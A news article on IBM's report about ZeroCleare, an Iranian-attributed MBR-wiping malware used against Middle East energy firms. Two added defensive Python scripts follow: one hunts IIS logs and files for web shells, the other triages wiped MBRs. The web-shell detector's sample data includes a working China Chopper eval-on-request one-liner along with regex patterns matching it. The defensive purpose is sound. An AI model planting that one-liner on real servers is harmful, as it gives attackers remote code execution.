Iranian hackers deploy new ZeroCleare data-wiping malware

[Image: destroyed hard drive. Credit: Markus Spiske]

Security researchers from IBM said today they identified a new strain of destructive data-wiping malware that was developed by Iranian state-sponsored hackers and deployed in cyber-attacks against energy companies active in the Middle East.

IBM did not name the companies that have been targeted and had data wiped in recent attacks.

Instead, IBM’s X-Force security team focused on analyzing the malware itself, which they named ZeroCleare.

A 28-page PDF report is available detailing the tool’s capabilities, which IBM said closely resemble those of Shamoon, one of the most dangerous and destructive malware strains of the past decade. A summary of the report’s main findings follows.

Created by xHunt and APT34

Unlike many cyber-security firms, IBM’s X-Force team did not shy away from attributing the malware and the attacks to a specific country — in this case, Iran.

“Based on the analysis of the malware and the attackers’ behavior, we suspect Iran-based nation-state adversaries were involved to develop and deploy this new wiper,” the IBM security team said.

But unlike many previous cyber-attacks, which are usually carried out by a single group, IBM said this malware and the attacks behind it appear to be the result of a collaboration between two of Iran’s top-tier government-backed hacking units.

According to IBM, the ZeroCleare malware is the brainchild of xHunt (Hive0081 in the IBM report) and APT34 (ITG13 in the IBM report, also known as Oilrig).

The ZeroCleare malware

As for the malware itself, ZeroCleare is your classic “wiper,” a strain of malware designed to delete as much data as possible from an infected host.

Wiper malware is usually used in one of two scenarios. It is either used to mask an intrusion by deleting crucial forensic evidence, or it is used to damage a victim’s ability to carry out normal business activity, as was the case in attacks like Shamoon, NotPetya, or Bad Rabbit.

While researching the recent ZeroCleare attacks, IBM said it identified two versions of the malware. One was created for 32-bit systems and a second for 64-bit systems. Of the two, IBM said that only the 64-bit version actually worked.

Researchers said that attacks usually began with the hackers executing brute-force attacks to gain access to weakly secured company network accounts.

Once they had access to an account on a company server, they exploited a SharePoint vulnerability to install web shells such as China Chopper and Tunna.

Once the attackers had a foothold inside a company, they moved laterally through the network to as many computers as possible, where they deployed ZeroCleare as the final step of the intrusion.
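The intrusion chain above leaves two artifacts a defender can hunt for on a SharePoint front end: repeated anonymous POSTs to a script page (the traffic pattern of a web shell being driven) and the one-line eval-on-request body that China Chopper plants on disk. The script below is an added example written for this page, not code from the IBM report or from either group’s tooling. The IIS log lines and file contents are constructed sample data; the “unauthenticated POST” heuristic, its threshold, and the China Chopper patterns are this example’s own assumptions about what the traffic looks like.

```python
"""Hunt for the web-shell stage of the intrusion described above.
All log lines and file contents here are constructed sample data."""
import re
from collections import Counter

# Constructed IIS W3C log excerpt. IIS replaces spaces inside fields with
# '+', so splitting on whitespace keeps the columns aligned with #Fields.
SAMPLE_IIS_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2019-09-20 10:01:02 10.0.0.5 GET /sites/ops/default.aspx - 443 CORP\\jdoe 10.0.1.23 Mozilla/5.0 200
2019-09-20 10:01:09 10.0.0.5 POST /_layouts/15/upload.aspx - 443 CORP\\jdoe 10.0.1.23 Mozilla/5.0 200
2019-09-20 10:02:31 10.0.0.5 POST /_layouts/15/images/help.aspx - 443 - 198.51.100.7 Mozilla/4.0 200
2019-09-20 10:02:33 10.0.0.5 POST /_layouts/15/images/help.aspx - 443 - 198.51.100.7 Mozilla/4.0 200
2019-09-20 10:02:40 10.0.0.5 POST /_layouts/15/images/help.aspx - 443 - 198.51.100.7 Mozilla/4.0 200
2019-09-20 10:02:58 10.0.0.5 POST /_layouts/15/images/help.aspx - 443 - 198.51.100.7 Mozilla/4.0 200
2019-09-20 10:03:10 10.0.0.5 GET /_layouts/15/start.aspx - 443 CORP\\asmith 10.0.1.44 Mozilla/5.0 200
"""

SCRIPT_EXT = (".aspx", ".ashx", ".asmx", ".php")


def parse_w3c(log_text):
    """Yield one dict per record, keyed by the names in the #Fields header."""
    fields = None
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed record: skip rather than misalign columns
        yield dict(zip(fields, values))


def suspicious_posts(log_text, threshold=3):
    """Return [(client_ip, uri, count)] for anonymous POSTs to script pages
    seen at least `threshold` times from one client. Heuristic (assumption):
    on a SharePoint farm almost every request carries a cs-username, so a
    burst of unauthenticated POSTs to a single .aspx is web-shell shaped."""
    counts = Counter()
    for rec in parse_w3c(log_text):
        if rec["cs-method"] != "POST" or rec["cs-username"] != "-":
            continue
        if not rec["cs-uri-stem"].lower().endswith(SCRIPT_EXT):
            continue
        counts[(rec["c-ip"], rec["cs-uri-stem"])] += 1
    return sorted((ip, uri, n) for (ip, uri), n in counts.items() if n >= threshold)


# China Chopper's server side is a one-liner that evals whatever arrives in a
# request parameter; these patterns cover the ASPX (JScript) and PHP forms.
CHOPPER_PATTERNS = [
    re.compile(r'eval\s*\(\s*Request\s*(\.Item)?\s*\[\s*["\'][^"\']+["\']\s*\]\s*,\s*["\']unsafe["\']', re.I),
    re.compile(r'@?eval\s*\(\s*\$_(POST|REQUEST|GET)\s*\[\s*["\'][^"\']+["\']\s*\]\s*\)', re.I),
]


def looks_like_china_chopper(content):
    """True when a file body matches a China Chopper style eval-on-request shell."""
    return any(p.search(content) for p in CHOPPER_PATTERNS)


# Constructed file contents: one planted shell, one benign page.
CONSTRUCTED_FILES = {
    "/_layouts/15/images/help.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "/_layouts/15/start.aspx":
        '<%@ Page Language="C#" %><html><body>Start</body></html>',
}

if __name__ == "__main__":
    for ip, uri, n in suspicious_posts(SAMPLE_IIS_LOG):
        print(f"suspicious: {n} anonymous POSTs to {uri} from {ip}")
    for path, body in CONSTRUCTED_FILES.items():
        if looks_like_china_chopper(body):
            print(f"web shell signature in {path}")
```

Run against real data, point `suspicious_posts` at the contents of a `u_ex*.log` file from the SharePoint server’s IIS log directory and `looks_like_china_chopper` at files under the web root; a hit on the traffic heuristic should be corroborated by the file check or by the page’s creation time before it is treated as an incident.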

“To gain access to the device’s core, ZeroCleare used an intentionally vulnerable driver and malicious PowerShell/Batch scripts to bypass Windows controls,” IBM said.

Once ZeroCleare had elevated privileges on a host, it would load EldoS RawDisk, a legitimate toolkit for interacting with files, disks, and partitions.

The malware then abused this legitimate tool to “wipe the MBR and damage disk partitions on a large number of networked devices,” researchers said.
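When a host is suspected of having been hit by an MBR wiper of this kind, the first triage question is whether sector 0 still holds a valid boot signature and a sane partition table, or whether it has been zeroed or overwritten. The parser below is an added forensic example written for this page, not code from the IBM report; the sample sectors are constructed in the file (via the `build_mbr` helper, which is this example’s own) so it runs offline, and the verdict strings are this example’s own labels.

```python
"""Classify a 512-byte MBR as intact, empty, corrupt, or wiped.
Added triage example; sample sectors below are constructed, not captured."""
import struct
import sys

SECTOR = 512
TABLE_OFF = 446            # four 16-byte partition entries start here
ENTRY_FMT = "<B3xB3xII"    # status, CHS start (skipped), type, CHS end (skipped), LBA start, sector count
BOOT_SIG = b"\x55\xAA"     # last two bytes of a valid MBR


def parse_mbr(sector):
    """Return {'signature_ok', 'partitions', 'problems'} for one 512-byte sector."""
    if len(sector) != SECTOR:
        raise ValueError(f"expected {SECTOR} bytes, got {len(sector)}")
    parts, problems = [], []
    for i in range(4):
        status, ptype, lba_start, sectors = struct.unpack_from(ENTRY_FMT, sector, TABLE_OFF + 16 * i)
        if ptype == 0 and lba_start == 0 and sectors == 0:
            continue  # unused slot
        if status not in (0x00, 0x80):
            problems.append(f"entry {i}: invalid status byte 0x{status:02x}")
        if lba_start == 0 or sectors == 0:
            problems.append(f"entry {i}: zero start or length")
        parts.append({"index": i, "bootable": status == 0x80, "type": ptype,
                      "lba_start": lba_start, "sectors": sectors})
    # Overlapping extents are a strong sign the table was overwritten with junk.
    ordered = sorted(parts, key=lambda p: p["lba_start"])
    for a, b in zip(ordered, ordered[1:]):
        if a["lba_start"] + a["sectors"] > b["lba_start"]:
            problems.append(f"entries {a['index']} and {b['index']} overlap")
    return {"signature_ok": sector[510:512] == BOOT_SIG, "partitions": parts, "problems": problems}


def classify(sector):
    """One-word verdict for triage. Labels are this example's own."""
    if not any(sector):
        return "zero-filled"
    info = parse_mbr(sector)
    if not info["signature_ok"]:
        return "boot signature missing"
    if not info["partitions"]:
        return "partition table empty"
    if info["problems"]:
        return "partition table corrupt"
    return "intact"


def build_mbr(entries, boot_code=b""):
    """Assemble a constructed MBR from (status, type, lba_start, sectors) tuples."""
    body = boot_code.ljust(TABLE_OFF, b"\x00")[:TABLE_OFF]
    table = b"".join(struct.pack(ENTRY_FMT, s, t, l, n) for s, t, l, n in entries)
    return body + table.ljust(64, b"\x00") + BOOT_SIG


# Constructed samples: a healthy two-partition disk, a zeroed sector,
# a sector overwritten with filler, and a table whose extents overlap.
SAMPLES = {
    "healthy": build_mbr([(0x80, 0x07, 2048, 204800), (0x00, 0x07, 206848, 1000000)]),
    "zeroed": bytes(SECTOR),
    "filler": b"\x90" * SECTOR,
    "overlap": build_mbr([(0x80, 0x07, 2048, 204800), (0x00, 0x07, 100000, 50000)]),
}

if __name__ == "__main__":
    if len(sys.argv) > 1:
        # e.g. a raw image or, with sufficient privilege, a block device
        with open(sys.argv[1], "rb") as f:
            print(sys.argv[1], "->", classify(f.read(SECTOR)))
    else:
        for name, sector in SAMPLES.items():
            print(f"{name:8s} -> {classify(sector)}")
```

A sector that fails the signature check but is not zero-filled is consistent with random overwrite; in that case do not attempt a boot repair on the live disk, image it first, since the partition table may be recoverable from the GPT backup header or filesystem superblock copies further in.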



IBM researchers pointed out that recent versions of the notorious Shamoon malware, used as recently as last year, also abused the same EldoS RawDisk toolkit for their destructive behavior. Shamoon was also created and operated by Iranian hackers, but by a different group, known as APT33 (Hive0016). It is unclear whether APT33 was involved in the creation of ZeroCleare. An initial version of the IBM report attributed ZeroCleare to APT33 and APT34, but this was changed to xHunt and APT34 shortly after publication, suggesting that attribution is not yet fully settled.

Other artifacts and indicators of compromise detailed in IBM’s report tied ZeroCleare to xHunt and APT34.

Attacks happened this fall, were “targeted”

While IBM didn’t share any details about ZeroCleare victims, an IBM daily threat assessment sent this fall suggests IBM first learned of this new malware and attacks around September 20.

IBM said that none of the ZeroCleare attacks were opportunistic and appeared to be targeted against very specific organizations.

Past Shamoon attacks targeted companies in the energy sector that were active in the Middle East region, companies that were either Saudi-based or known partners for Saudi-based oil & gas enterprises.

Article updated two hours after publication to replace the name of one hacking group from APT33 to xHunt after IBM corrected its own report.
